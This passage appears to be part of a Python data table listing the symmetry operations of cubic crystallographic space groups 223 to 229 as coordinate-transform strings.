223: ['x,y,z', '-x,-y,z', '-x,y,-z', 'x,-y,-z', 'z,x,y', 'z,-x,-y', '-z,-x,y', '-z,x,-y', 'y,z,x', '-y,z,-x',
'y,-z,-x', '-y,-z,x', 'y+1/2,x+1/2,-z+1/2', '-y+1/2,-x+1/2,-z+1/2', 'y+1/2,-x+1/2,z+1/2',
'-y+1/2,x+1/2,z+1/2', 'x+1/2,z+1/2,-y+1/2', '-x+1/2,z+1/2,y+1/2', '-x+1/2,-z+1/2,-y+1/2',
'x+1/2,-z+1/2,y+1/2', 'z+1/2,y+1/2,-x+1/2', 'z+1/2,-y+1/2,x+1/2', '-z+1/2,y+1/2,x+1/2',
'-z+1/2,-y+1/2,-x+1/2', '-x,-y,-z', 'x,y,-z', 'x,-y,z', '-x,y,z', '-z,-x,-y', '-z,x,y', 'z,x,-y',
'z,-x,y', '-y,-z,-x', 'y,-z,x', '-y,z,x', 'y,z,-x', '-y+1/2,-x+1/2,z+1/2', 'y+1/2,x+1/2,z+1/2',
'-y+1/2,x+1/2,-z+1/2', 'y+1/2,-x+1/2,-z+1/2', '-x+1/2,-z+1/2,y+1/2', 'x+1/2,-z+1/2,-y+1/2',
'x+1/2,z+1/2,y+1/2', '-x+1/2,z+1/2,-y+1/2', '-z+1/2,-y+1/2,x+1/2', '-z+1/2,y+1/2,-x+1/2',
'z+1/2,-y+1/2,-x+1/2', 'z+1/2,y+1/2,x+1/2'],
224: ['x,y,z', '-x+1/2,-y+1/2,z', '-x+1/2,y,-z+1/2', 'x,-y+1/2,-z+1/2', 'z,x,y', 'z,-x+1/2,-y+1/2',
'-z+1/2,-x+1/2,y', '-z+1/2,x,-y+1/2', 'y,z,x', '-y+1/2,z,-x+1/2', 'y,-z+1/2,-x+1/2', '-y+1/2,-z+1/2,x',
'y+1/2,x+1/2,-z', '-y,-x,-z', 'y+1/2,-x,z+1/2', '-y,x+1/2,z+1/2', 'x+1/2,z+1/2,-y', '-x,z+1/2,y+1/2',
'-x,-z,-y', 'x+1/2,-z,y+1/2', 'z+1/2,y+1/2,-x', 'z+1/2,-y,x+1/2', '-z,y+1/2,x+1/2', '-z,-y,-x',
'-x,-y,-z', 'x+1/2,y+1/2,-z', 'x+1/2,-y,z+1/2', '-x,y+1/2,z+1/2', '-z,-x,-y', '-z,x+1/2,y+1/2',
'z+1/2,x+1/2,-y', 'z+1/2,-x,y+1/2', '-y,-z,-x', 'y+1/2,-z,x+1/2', '-y,z+1/2,x+1/2', 'y+1/2,z+1/2,-x',
'-y+1/2,-x+1/2,z', 'y,x,z', '-y+1/2,x,-z+1/2', 'y,-x+1/2,-z+1/2', '-x+1/2,-z+1/2,y', 'x,-z+1/2,-y+1/2',
'x,z,y', '-x+1/2,z,-y+1/2', '-z+1/2,-y+1/2,x', '-z+1/2,y,-x+1/2', 'z,-y+1/2,-x+1/2', 'z,y,x'],
225: ['x,y,z', '-x,-y,z', '-x,y,-z', 'x,-y,-z', 'z,x,y', 'z,-x,-y', '-z,-x,y', '-z,x,-y', 'y,z,x', '-y,z,-x',
'y,-z,-x', '-y,-z,x', 'y,x,-z', '-y,-x,-z', 'y,-x,z', '-y,x,z', 'x,z,-y', '-x,z,y', '-x,-z,-y', 'x,-z,y',
'z,y,-x', 'z,-y,x', '-z,y,x', '-z,-y,-x', '-x,-y,-z', 'x,y,-z', 'x,-y,z', '-x,y,z', '-z,-x,-y', '-z,x,y',
'z,x,-y', 'z,-x,y', '-y,-z,-x', 'y,-z,x', '-y,z,x', 'y,z,-x', '-y,-x,z', 'y,x,z', '-y,x,-z', 'y,-x,-z',
'-x,-z,y', 'x,-z,-y', 'x,z,y', '-x,z,-y', '-z,-y,x', '-z,y,-x', 'z,-y,-x', 'z,y,x', 'x,y+1/2,z+1/2',
'-x,-y+1/2,z+1/2', '-x,y+1/2,-z+1/2', 'x,-y+1/2,-z+1/2', 'z,x+1/2,y+1/2', 'z,-x+1/2,-y+1/2',
'-z,-x+1/2,y+1/2', '-z,x+1/2,-y+1/2', 'y,z+1/2,x+1/2', '-y,z+1/2,-x+1/2', 'y,-z+1/2,-x+1/2',
'-y,-z+1/2,x+1/2', 'y,x+1/2,-z+1/2', '-y,-x+1/2,-z+1/2', 'y,-x+1/2,z+1/2', '-y,x+1/2,z+1/2',
'x,z+1/2,-y+1/2', '-x,z+1/2,y+1/2', '-x,-z+1/2,-y+1/2', 'x,-z+1/2,y+1/2', 'z,y+1/2,-x+1/2',
'z,-y+1/2,x+1/2', '-z,y+1/2,x+1/2', '-z,-y+1/2,-x+1/2', '-x,-y+1/2,-z+1/2', 'x,y+1/2,-z+1/2',
'x,-y+1/2,z+1/2', '-x,y+1/2,z+1/2', '-z,-x+1/2,-y+1/2', '-z,x+1/2,y+1/2', 'z,x+1/2,-y+1/2',
'z,-x+1/2,y+1/2', '-y,-z+1/2,-x+1/2', 'y,-z+1/2,x+1/2', '-y,z+1/2,x+1/2', 'y,z+1/2,-x+1/2',
'-y,-x+1/2,z+1/2', 'y,x+1/2,z+1/2', '-y,x+1/2,-z+1/2', 'y,-x+1/2,-z+1/2', '-x,-z+1/2,y+1/2',
'x,-z+1/2,-y+1/2', 'x,z+1/2,y+1/2', '-x,z+1/2,-y+1/2', '-z,-y+1/2,x+1/2', '-z,y+1/2,-x+1/2',
'z,-y+1/2,-x+1/2', 'z,y+1/2,x+1/2', 'x+1/2,y,z+1/2', '-x+1/2,-y,z+1/2', '-x+1/2,y,-z+1/2',
'x+1/2,-y,-z+1/2', 'z+1/2,x,y+1/2', 'z+1/2,-x,-y+1/2', '-z+1/2,-x,y+1/2', '-z+1/2,x,-y+1/2',
'y+1/2,z,x+1/2', '-y+1/2,z,-x+1/2', 'y+1/2,-z,-x+1/2', '-y+1/2,-z,x+1/2', 'y+1/2,x,-z+1/2',
'-y+1/2,-x,-z+1/2', 'y+1/2,-x,z+1/2', '-y+1/2,x,z+1/2', 'x+1/2,z,-y+1/2', '-x+1/2,z,y+1/2',
'-x+1/2,-z,-y+1/2', 'x+1/2,-z,y+1/2', 'z+1/2,y,-x+1/2', 'z+1/2,-y,x+1/2', '-z+1/2,y,x+1/2',
'-z+1/2,-y,-x+1/2', '-x+1/2,-y,-z+1/2', 'x+1/2,y,-z+1/2', 'x+1/2,-y,z+1/2', '-x+1/2,y,z+1/2',
'-z+1/2,-x,-y+1/2', '-z+1/2,x,y+1/2', 'z+1/2,x,-y+1/2', 'z+1/2,-x,y+1/2', '-y+1/2,-z,-x+1/2',
'y+1/2,-z,x+1/2', '-y+1/2,z,x+1/2', 'y+1/2,z,-x+1/2', '-y+1/2,-x,z+1/2', 'y+1/2,x,z+1/2',
'-y+1/2,x,-z+1/2', 'y+1/2,-x,-z+1/2', '-x+1/2,-z,y+1/2', 'x+1/2,-z,-y+1/2', 'x+1/2,z,y+1/2',
'-x+1/2,z,-y+1/2', '-z+1/2,-y,x+1/2', '-z+1/2,y,-x+1/2', 'z+1/2,-y,-x+1/2', 'z+1/2,y,x+1/2',
'x+1/2,y+1/2,z', '-x+1/2,-y+1/2,z', '-x+1/2,y+1/2,-z', 'x+1/2,-y+1/2,-z', 'z+1/2,x+1/2,y',
'z+1/2,-x+1/2,-y', '-z+1/2,-x+1/2,y', '-z+1/2,x+1/2,-y', 'y+1/2,z+1/2,x', '-y+1/2,z+1/2,-x',
'y+1/2,-z+1/2,-x', '-y+1/2,-z+1/2,x', 'y+1/2,x+1/2,-z', '-y+1/2,-x+1/2,-z', 'y+1/2,-x+1/2,z',
'-y+1/2,x+1/2,z', 'x+1/2,z+1/2,-y', '-x+1/2,z+1/2,y', '-x+1/2,-z+1/2,-y', 'x+1/2,-z+1/2,y',
'z+1/2,y+1/2,-x', 'z+1/2,-y+1/2,x', '-z+1/2,y+1/2,x', '-z+1/2,-y+1/2,-x', '-x+1/2,-y+1/2,-z',
'x+1/2,y+1/2,-z', 'x+1/2,-y+1/2,z', '-x+1/2,y+1/2,z', '-z+1/2,-x+1/2,-y', '-z+1/2,x+1/2,y',
'z+1/2,x+1/2,-y', 'z+1/2,-x+1/2,y', '-y+1/2,-z+1/2,-x', 'y+1/2,-z+1/2,x', '-y+1/2,z+1/2,x',
'y+1/2,z+1/2,-x', '-y+1/2,-x+1/2,z', 'y+1/2,x+1/2,z', '-y+1/2,x+1/2,-z', 'y+1/2,-x+1/2,-z',
'-x+1/2,-z+1/2,y', 'x+1/2,-z+1/2,-y', 'x+1/2,z+1/2,y', '-x+1/2,z+1/2,-y', '-z+1/2,-y+1/2,x',
'-z+1/2,y+1/2,-x', 'z+1/2,-y+1/2,-x', 'z+1/2,y+1/2,x'],
226: ['x,y,z', '-x,-y,z', '-x,y,-z', 'x,-y,-z', 'z,x,y', 'z,-x,-y', '-z,-x,y', '-z,x,-y', 'y,z,x', '-y,z,-x',
'y,-z,-x', '-y,-z,x', 'y+1/2,x+1/2,-z+1/2', '-y+1/2,-x+1/2,-z+1/2', 'y+1/2,-x+1/2,z+1/2',
'-y+1/2,x+1/2,z+1/2', 'x+1/2,z+1/2,-y+1/2', '-x+1/2,z+1/2,y+1/2', '-x+1/2,-z+1/2,-y+1/2',
'x+1/2,-z+1/2,y+1/2', 'z+1/2,y+1/2,-x+1/2', 'z+1/2,-y+1/2,x+1/2', '-z+1/2,y+1/2,x+1/2',
'-z+1/2,-y+1/2,-x+1/2', '-x,-y,-z', 'x,y,-z', 'x,-y,z', '-x,y,z', '-z,-x,-y', '-z,x,y', 'z,x,-y',
'z,-x,y', '-y,-z,-x', 'y,-z,x', '-y,z,x', 'y,z,-x', '-y+1/2,-x+1/2,z+1/2', 'y+1/2,x+1/2,z+1/2',
'-y+1/2,x+1/2,-z+1/2', 'y+1/2,-x+1/2,-z+1/2', '-x+1/2,-z+1/2,y+1/2', 'x+1/2,-z+1/2,-y+1/2',
'x+1/2,z+1/2,y+1/2', '-x+1/2,z+1/2,-y+1/2', '-z+1/2,-y+1/2,x+1/2', '-z+1/2,y+1/2,-x+1/2',
'z+1/2,-y+1/2,-x+1/2', 'z+1/2,y+1/2,x+1/2', 'x,y+1/2,z+1/2', '-x,-y+1/2,z+1/2', '-x,y+1/2,-z+1/2',
'x,-y+1/2,-z+1/2', 'z,x+1/2,y+1/2', 'z,-x+1/2,-y+1/2', '-z,-x+1/2,y+1/2', '-z,x+1/2,-y+1/2',
'y,z+1/2,x+1/2', '-y,z+1/2,-x+1/2', 'y,-z+1/2,-x+1/2', '-y,-z+1/2,x+1/2', 'y+1/2,x,-z', '-y+1/2,-x,-z',
'y+1/2,-x,z', '-y+1/2,x,z', 'x+1/2,z,-y', '-x+1/2,z,y', '-x+1/2,-z,-y', 'x+1/2,-z,y', 'z+1/2,y,-x',
'z+1/2,-y,x', '-z+1/2,y,x', '-z+1/2,-y,-x', '-x,-y+1/2,-z+1/2', 'x,y+1/2,-z+1/2', 'x,-y+1/2,z+1/2',
'-x,y+1/2,z+1/2', '-z,-x+1/2,-y+1/2', '-z,x+1/2,y+1/2', 'z,x+1/2,-y+1/2', 'z,-x+1/2,y+1/2',
'-y,-z+1/2,-x+1/2', 'y,-z+1/2,x+1/2', '-y,z+1/2,x+1/2', 'y,z+1/2,-x+1/2', '-y+1/2,-x,z', 'y+1/2,x,z',
'-y+1/2,x,-z', 'y+1/2,-x,-z', '-x+1/2,-z,y', 'x+1/2,-z,-y', 'x+1/2,z,y', '-x+1/2,z,-y', '-z+1/2,-y,x',
'-z+1/2,y,-x', 'z+1/2,-y,-x', 'z+1/2,y,x', 'x+1/2,y,z+1/2', '-x+1/2,-y,z+1/2', '-x+1/2,y,-z+1/2',
'x+1/2,-y,-z+1/2', 'z+1/2,x,y+1/2', 'z+1/2,-x,-y+1/2', '-z+1/2,-x,y+1/2', '-z+1/2,x,-y+1/2',
'y+1/2,z,x+1/2', '-y+1/2,z,-x+1/2', 'y+1/2,-z,-x+1/2', '-y+1/2,-z,x+1/2', 'y,x+1/2,-z', '-y,-x+1/2,-z',
'y,-x+1/2,z', '-y,x+1/2,z', 'x,z+1/2,-y', '-x,z+1/2,y', '-x,-z+1/2,-y', 'x,-z+1/2,y', 'z,y+1/2,-x',
'z,-y+1/2,x', '-z,y+1/2,x', '-z,-y+1/2,-x', '-x+1/2,-y,-z+1/2', 'x+1/2,y,-z+1/2', 'x+1/2,-y,z+1/2',
'-x+1/2,y,z+1/2', '-z+1/2,-x,-y+1/2', '-z+1/2,x,y+1/2', 'z+1/2,x,-y+1/2', 'z+1/2,-x,y+1/2',
'-y+1/2,-z,-x+1/2', 'y+1/2,-z,x+1/2', '-y+1/2,z,x+1/2', 'y+1/2,z,-x+1/2', '-y,-x+1/2,z', 'y,x+1/2,z',
'-y,x+1/2,-z', 'y,-x+1/2,-z', '-x,-z+1/2,y', 'x,-z+1/2,-y', 'x,z+1/2,y', '-x,z+1/2,-y', '-z,-y+1/2,x',
'-z,y+1/2,-x', 'z,-y+1/2,-x', 'z,y+1/2,x', 'x+1/2,y+1/2,z', '-x+1/2,-y+1/2,z', '-x+1/2,y+1/2,-z',
'x+1/2,-y+1/2,-z', 'z+1/2,x+1/2,y', 'z+1/2,-x+1/2,-y', '-z+1/2,-x+1/2,y', '-z+1/2,x+1/2,-y',
'y+1/2,z+1/2,x', '-y+1/2,z+1/2,-x', 'y+1/2,-z+1/2,-x', '-y+1/2,-z+1/2,x', 'y,x,-z+1/2', '-y,-x,-z+1/2',
'y,-x,z+1/2', '-y,x,z+1/2', 'x,z,-y+1/2', '-x,z,y+1/2', '-x,-z,-y+1/2', 'x,-z,y+1/2', 'z,y,-x+1/2',
'z,-y,x+1/2', '-z,y,x+1/2', '-z,-y,-x+1/2', '-x+1/2,-y+1/2,-z', 'x+1/2,y+1/2,-z', 'x+1/2,-y+1/2,z',
'-x+1/2,y+1/2,z', '-z+1/2,-x+1/2,-y', '-z+1/2,x+1/2,y', 'z+1/2,x+1/2,-y', 'z+1/2,-x+1/2,y',
'-y+1/2,-z+1/2,-x', 'y+1/2,-z+1/2,x', '-y+1/2,z+1/2,x', 'y+1/2,z+1/2,-x', '-y,-x,z+1/2', 'y,x,z+1/2',
'-y,x,-z+1/2', 'y,-x,-z+1/2', '-x,-z,y+1/2', 'x,-z,-y+1/2', 'x,z,y+1/2', '-x,z,-y+1/2', '-z,-y,x+1/2',
'-z,y,-x+1/2', 'z,-y,-x+1/2', 'z,y,x+1/2'],
227: ['x,y,z', '-x+3/4,-y+1/4,z+1/2', '-x+1/4,y+1/2,-z+3/4', 'x+1/2,-y+3/4,-z+1/4', 'z,x,y',
'z+1/2,-x+3/4,-y+1/4', '-z+3/4,-x+1/4,y+1/2', '-z+1/4,x+1/2,-y+3/4', 'y,z,x', '-y+1/4,z+1/2,-x+3/4',
'y+1/2,-z+3/4,-x+1/4', '-y+3/4,-z+1/4,x+1/2', 'y+3/4,x+1/4,-z+1/2', '-y,-x,-z', 'y+1/4,-x+1/2,z+3/4',
'-y+1/2,x+3/4,z+1/4', 'x+3/4,z+1/4,-y+1/2', '-x+1/2,z+3/4,y+1/4', '-x,-z,-y', 'x+1/4,-z+1/2,y+3/4',
'z+3/4,y+1/4,-x+1/2', 'z+1/4,-y+1/2,x+3/4', '-z+1/2,y+3/4,x+1/4', '-z,-y,-x', '-x,-y,-z',
'x+1/4,y+3/4,-z+1/2', 'x+3/4,-y+1/2,z+1/4', '-x+1/2,y+1/4,z+3/4', '-z,-x,-y', '-z+1/2,x+1/4,y+3/4',
'z+1/4,x+3/4,-y+1/2', 'z+3/4,-x+1/2,y+1/4', '-y,-z,-x', 'y+3/4,-z+1/2,x+1/4', '-y+1/2,z+1/4,x+3/4',
'y+1/4,z+3/4,-x+1/2', '-y+1/4,-x+3/4,z+1/2', 'y,x,z', '-y+3/4,x+1/2,-z+1/4', 'y+1/2,-x+1/4,-z+3/4',
'-x+1/4,-z+3/4,y+1/2', 'x+1/2,-z+1/4,-y+3/4', 'x,z,y', '-x+3/4,z+1/2,-y+1/4', '-z+1/4,-y+3/4,x+1/2',
'-z+3/4,y+1/2,-x+1/4', 'z+1/2,-y+1/4,-x+3/4', 'z,y,x', 'x,y+1/2,z+1/2', '-x+3/4,-y+3/4,z',
'-x+1/4,y,-z+1/4', 'x+1/2,-y+1/4,-z+3/4', 'z,x+1/2,y+1/2', 'z+1/2,-x+1/4,-y+3/4', '-z+3/4,-x+3/4,y',
'-z+1/4,x,-y+1/4', 'y,z+1/2,x+1/2', '-y+1/4,z,-x+1/4', 'y+1/2,-z+1/4,-x+3/4', '-y+3/4,-z+3/4,x',
'y+3/4,x+3/4,-z', '-y,-x+1/2,-z+1/2', 'y+1/4,-x,z+1/4', '-y+1/2,x+1/4,z+3/4', 'x+3/4,z+3/4,-y',
'-x+1/2,z+1/4,y+3/4', '-x,-z+1/2,-y+1/2', 'x+1/4,-z,y+1/4', 'z+3/4,y+3/4,-x', 'z+1/4,-y,x+1/4',
'-z+1/2,y+1/4,x+3/4', '-z,-y+1/2,-x+1/2', '-x,-y+1/2,-z+1/2', 'x+1/4,y+1/4,-z', 'x+3/4,-y,z+3/4',
'-x+1/2,y+3/4,z+1/4', '-z,-x+1/2,-y+1/2', '-z+1/2,x+3/4,y+1/4', 'z+1/4,x+1/4,-y', 'z+3/4,-x,y+3/4',
'-y,-z+1/2,-x+1/2', 'y+3/4,-z,x+3/4', '-y+1/2,z+3/4,x+1/4', 'y+1/4,z+1/4,-x', '-y+1/4,-x+1/4,z',
'y,x+1/2,z+1/2', '-y+3/4,x,-z+3/4', 'y+1/2,-x+3/4,-z+1/4', '-x+1/4,-z+1/4,y', 'x+1/2,-z+3/4,-y+1/4',
'x,z+1/2,y+1/2', '-x+3/4,z,-y+3/4', '-z+1/4,-y+1/4,x', '-z+3/4,y,-x+3/4', 'z+1/2,-y+3/4,-x+1/4',
'z,y+1/2,x+1/2', 'x+1/2,y,z+1/2', '-x+1/4,-y+1/4,z', '-x+3/4,y+1/2,-z+1/4', 'x,-y+3/4,-z+3/4',
'z+1/2,x,y+1/2', 'z,-x+3/4,-y+3/4', '-z+1/4,-x+1/4,y', '-z+3/4,x+1/2,-y+1/4', 'y+1/2,z,x+1/2',
'-y+3/4,z+1/2,-x+1/4', 'y,-z+3/4,-x+3/4', '-y+1/4,-z+1/4,x', 'y+1/4,x+1/4,-z', '-y+1/2,-x,-z+1/2',
'y+3/4,-x+1/2,z+1/4', '-y,x+3/4,z+3/4', 'x+1/4,z+1/4,-y', '-x,z+3/4,y+3/4', '-x+1/2,-z,-y+1/2',
'x+3/4,-z+1/2,y+1/4', 'z+1/4,y+1/4,-x', 'z+3/4,-y+1/2,x+1/4', '-z,y+3/4,x+3/4', '-z+1/2,-y,-x+1/2',
'-x+1/2,-y,-z+1/2', 'x+3/4,y+3/4,-z', 'x+1/4,-y+1/2,z+3/4', '-x,y+1/4,z+1/4', '-z+1/2,-x,-y+1/2',
'-z,x+1/4,y+1/4', 'z+3/4,x+3/4,-y', 'z+1/4,-x+1/2,y+3/4', '-y+1/2,-z,-x+1/2', 'y+1/4,-z+1/2,x+3/4',
'-y,z+1/4,x+1/4', 'y+3/4,z+3/4,-x', '-y+3/4,-x+3/4,z', 'y+1/2,x,z+1/2', '-y+1/4,x+1/2,-z+3/4',
'y,-x+1/4,-z+1/4', '-x+3/4,-z+3/4,y', 'x,-z+1/4,-y+1/4', 'x+1/2,z,y+1/2', '-x+1/4,z+1/2,-y+3/4',
'-z+3/4,-y+3/4,x', '-z+1/4,y+1/2,-x+3/4', 'z,-y+1/4,-x+1/4', 'z+1/2,y,x+1/2', 'x+1/2,y+1/2,z',
'-x+1/4,-y+3/4,z+1/2', '-x+3/4,y,-z+3/4', 'x,-y+1/4,-z+1/4', 'z+1/2,x+1/2,y', 'z,-x+1/4,-y+1/4',
'-z+1/4,-x+3/4,y+1/2', '-z+3/4,x,-y+3/4', 'y+1/2,z+1/2,x', '-y+3/4,z,-x+3/4', 'y,-z+1/4,-x+1/4',
'-y+1/4,-z+3/4,x+1/2', 'y+1/4,x+3/4,-z+1/2', '-y+1/2,-x+1/2,-z', 'y+3/4,-x,z+3/4', '-y,x+1/4,z+1/4',
'x+1/4,z+3/4,-y+1/2', '-x,z+1/4,y+1/4', '-x+1/2,-z+1/2,-y', 'x+3/4,-z,y+3/4', 'z+1/4,y+3/4,-x+1/2',
'z+3/4,-y,x+3/4', '-z,y+1/4,x+1/4', '-z+1/2,-y+1/2,-x', '-x+1/2,-y+1/2,-z', 'x+3/4,y+1/4,-z+1/2',
'x+1/4,-y,z+1/4', '-x,y+3/4,z+3/4', '-z+1/2,-x+1/2,-y', '-z,x+3/4,y+3/4', 'z+3/4,x+1/4,-y+1/2',
'z+1/4,-x,y+1/4', '-y+1/2,-z+1/2,-x', 'y+1/4,-z,x+1/4', '-y,z+3/4,x+3/4', 'y+3/4,z+1/4,-x+1/2',
'-y+3/4,-x+1/4,z+1/2', 'y+1/2,x+1/2,z', '-y+1/4,x,-z+1/4', 'y,-x+3/4,-z+3/4', '-x+3/4,-z+1/4,y+1/2',
'x,-z+3/4,-y+3/4', 'x+1/2,z+1/2,y', '-x+1/4,z,-y+1/4', '-z+3/4,-y+1/4,x+1/2', '-z+1/4,y,-x+1/4',
'z,-y+3/4,-x+3/4', 'z+1/2,y+1/2,x'],
228: ['x,y,z', '-x+1/4,-y+3/4,z+1/2', '-x+3/4,y+1/2,-z+1/4', 'x+1/2,-y+1/4,-z+3/4', 'z,x,y',
'z+1/2,-x+1/4,-y+3/4', '-z+1/4,-x+3/4,y+1/2', '-z+3/4,x+1/2,-y+1/4', 'y,z,x', '-y+3/4,z+1/2,-x+1/4',
'y+1/2,-z+1/4,-x+3/4', '-y+1/4,-z+3/4,x+1/2', 'y+3/4,x+1/4,-z', '-y+1/2,-x+1/2,-z+1/2', 'y+1/4,-x,z+3/4',
'-y,x+3/4,z+1/4', 'x+3/4,z+1/4,-y', '-x,z+3/4,y+1/4', '-x+1/2,-z+1/2,-y+1/2', 'x+1/4,-z,y+3/4',
'z+3/4,y+1/4,-x', 'z+1/4,-y,x+3/4', '-z,y+3/4,x+1/4', '-z+1/2,-y+1/2,-x+1/2', '-x,-y,-z',
'x+3/4,y+1/4,-z+1/2', 'x+1/4,-y+1/2,z+3/4', '-x+1/2,y+3/4,z+1/4', '-z,-x,-y', '-z+1/2,x+3/4,y+1/4',
'z+3/4,x+1/4,-y+1/2', 'z+1/4,-x+1/2,y+3/4', '-y,-z,-x', 'y+1/4,-z+1/2,x+3/4', '-y+1/2,z+3/4,x+1/4',
'y+3/4,z+1/4,-x+1/2', '-y+1/4,-x+3/4,z', 'y+1/2,x+1/2,z+1/2', '-y+3/4,x,-z+1/4', 'y,-x+1/4,-z+3/4',
'-x+1/4,-z+3/4,y', 'x,-z+1/4,-y+3/4', 'x+1/2,z+1/2,y+1/2', '-x+3/4,z,-y+1/4', '-z+1/4,-y+3/4,x',
'-z+3/4,y,-x+1/4', 'z,-y+1/4,-x+3/4', 'z+1/2,y+1/2,x+1/2', 'x,y+1/2,z+1/2', '-x+1/4,-y+1/4,z',
'-x+3/4,y,-z+3/4', 'x+1/2,-y+3/4,-z+1/4', 'z,x+1/2,y+1/2', 'z+1/2,-x+3/4,-y+1/4', '-z+1/4,-x+1/4,y',
'-z+3/4,x,-y+3/4', 'y,z+1/2,x+1/2', '-y+3/4,z,-x+3/4', 'y+1/2,-z+3/4,-x+1/4', '-y+1/4,-z+1/4,x',
'y+3/4,x+3/4,-z+1/2', '-y+1/2,-x,-z', 'y+1/4,-x+1/2,z+1/4', '-y,x+1/4,z+3/4', 'x+3/4,z+3/4,-y+1/2',
'-x,z+1/4,y+3/4', '-x+1/2,-z,-y', 'x+1/4,-z+1/2,y+1/4', 'z+3/4,y+3/4,-x+1/2', 'z+1/4,-y+1/2,x+1/4',
'-z,y+1/4,x+3/4', '-z+1/2,-y,-x', '-x,-y+1/2,-z+1/2', 'x+3/4,y+3/4,-z', 'x+1/4,-y,z+1/4',
'-x+1/2,y+1/4,z+3/4', '-z,-x+1/2,-y+1/2', '-z+1/2,x+1/4,y+3/4', 'z+3/4,x+3/4,-y', 'z+1/4,-x,y+1/4',
'-y,-z+1/2,-x+1/2', 'y+1/4,-z,x+1/4', '-y+1/2,z+1/4,x+3/4', 'y+3/4,z+3/4,-x', '-y+1/4,-x+1/4,z+1/2',
'y+1/2,x,z', '-y+3/4,x+1/2,-z+3/4', 'y,-x+3/4,-z+1/4', '-x+1/4,-z+1/4,y+1/2', 'x,-z+3/4,-y+1/4',
'x+1/2,z,y', '-x+3/4,z+1/2,-y+3/4', '-z+1/4,-y+1/4,x+1/2', '-z+3/4,y+1/2,-x+3/4', 'z,-y+3/4,-x+1/4',
'z+1/2,y,x', 'x+1/2,y,z+1/2', '-x+3/4,-y+3/4,z', '-x+1/4,y+1/2,-z+3/4', 'x,-y+1/4,-z+1/4',
'z+1/2,x,y+1/2', 'z,-x+1/4,-y+1/4', '-z+3/4,-x+3/4,y', '-z+1/4,x+1/2,-y+3/4', 'y+1/2,z,x+1/2',
'-y+1/4,z+1/2,-x+3/4', 'y,-z+1/4,-x+1/4', '-y+3/4,-z+3/4,x', 'y+1/4,x+1/4,-z+1/2', '-y,-x+1/2,-z',
'y+3/4,-x,z+1/4', '-y+1/2,x+3/4,z+3/4', 'x+1/4,z+1/4,-y+1/2', '-x+1/2,z+3/4,y+3/4', '-x,-z+1/2,-y',
'x+3/4,-z,y+1/4', 'z+1/4,y+1/4,-x+1/2', 'z+3/4,-y,x+1/4', '-z+1/2,y+3/4,x+3/4', '-z,-y+1/2,-x',
'-x+1/2,-y,-z+1/2', 'x+1/4,y+1/4,-z', 'x+3/4,-y+1/2,z+1/4', '-x,y+3/4,z+3/4', '-z+1/2,-x,-y+1/2',
'-z,x+3/4,y+3/4', 'z+1/4,x+1/4,-y', 'z+3/4,-x+1/2,y+1/4', '-y+1/2,-z,-x+1/2', 'y+3/4,-z+1/2,x+1/4',
'-y,z+3/4,x+3/4', 'y+1/4,z+1/4,-x', '-y+3/4,-x+3/4,z+1/2', 'y,x+1/2,z', '-y+1/4,x,-z+3/4',
'y+1/2,-x+1/4,-z+1/4', '-x+3/4,-z+3/4,y+1/2', 'x+1/2,-z+1/4,-y+1/4', 'x,z+1/2,y', '-x+1/4,z,-y+3/4',
'-z+3/4,-y+3/4,x+1/2', '-z+1/4,y,-x+3/4', 'z+1/2,-y+1/4,-x+1/4', 'z,y+1/2,x', 'x+1/2,y+1/2,z',
'-x+3/4,-y+1/4,z+1/2', '-x+1/4,y,-z+1/4', 'x,-y+3/4,-z+3/4', 'z+1/2,x+1/2,y', 'z,-x+3/4,-y+3/4',
'-z+3/4,-x+1/4,y+1/2', '-z+1/4,x,-y+1/4', 'y+1/2,z+1/2,x', '-y+1/4,z,-x+1/4', 'y,-z+3/4,-x+3/4',
'-y+3/4,-z+1/4,x+1/2', 'y+1/4,x+3/4,-z', '-y,-x,-z+1/2', 'y+3/4,-x+1/2,z+3/4', '-y+1/2,x+1/4,z+1/4',
'x+1/4,z+3/4,-y', '-x+1/2,z+1/4,y+1/4', '-x,-z,-y+1/2', 'x+3/4,-z+1/2,y+3/4', 'z+1/4,y+3/4,-x',
'z+3/4,-y+1/2,x+3/4', '-z+1/2,y+1/4,x+1/4', '-z,-y,-x+1/2', '-x+1/2,-y+1/2,-z', 'x+1/4,y+3/4,-z+1/2',
'x+3/4,-y,z+3/4', '-x,y+1/4,z+1/4', '-z+1/2,-x+1/2,-y', '-z,x+1/4,y+1/4', 'z+1/4,x+3/4,-y+1/2',
'z+3/4,-x,y+3/4', '-y+1/2,-z+1/2,-x', 'y+3/4,-z,x+3/4', '-y,z+1/4,x+1/4', 'y+1/4,z+3/4,-x+1/2',
'-y+3/4,-x+1/4,z', 'y,x,z+1/2', '-y+1/4,x+1/2,-z+1/4', 'y+1/2,-x+3/4,-z+3/4', '-x+3/4,-z+1/4,y',
'x+1/2,-z+3/4,-y+3/4', 'x,z,y+1/2', '-x+1/4,z+1/2,-y+1/4', '-z+3/4,-y+1/4,x', '-z+1/4,y+1/2,-x+1/4',
'z+1/2,-y+3/4,-x+3/4', 'z,y,x+1/2'],
229: ['x,y,z', '-x,-y,z', '-x,y,-z', 'x,-y,-z', 'z,x,y', 'z,-x,-y', '-z,-x,y', '-z,x,-y', 'y,z,x', '-y,z,-x',
'y,-z,-x', '-y,-z,x', 'y,x,-z', '-y,-x,-z', 'y,-x,z', '-y,x,z', 'x,z,-y', '-x,z,y', '-x,-z,-y', 'x,-z,y',
'z,y,-x', 'z,-y,x', '-z,y,x', '-z,-y,-x', '-x,-y,-z', 'x,y,-z', 'x,-y,z', '-x,y,z', '-z,-x,-y', '-z,x,y',
'z,x,-y', 'z,-x,y', '-y,-z,-x', 'y,-z,x', '-y,z,x', 'y,z,-x', '-y,-x,z', 'y,x,z', '-y,x,-z', 'y,-x,-z',
'-x,-z,y', 'x,-z,-y', 'x,z,y', '-x,z,-y', '-z,-y,x', '-z,y,-x', 'z,-y,-x', 'z,y,x', 'x+1/2,y+1/2,z+1/2',
'-x+1/2,-y+1/2,z+1/2', '-x+1/2,y+1/2,-z+1/2', 'x+1/2,-y+1/2,-z+1/2', 'z+1/2,x+1/2,y+1/2',
'z+1/2,-x+1/2,-y+1/2', '-z+1/2,-x+1/2,y+1/2', '-z+1/2,x+1/2,-y+1/2', 'y+1/2,z+1/2,x+1/2',
'-y+1/2,z+1/2,-x+1/2', 'y+1/2,-z+1/2,-x+1/2', '-y+1/2,-z+1/2,x+1/2', 'y+1/2,x+1/2,-z+1/2',
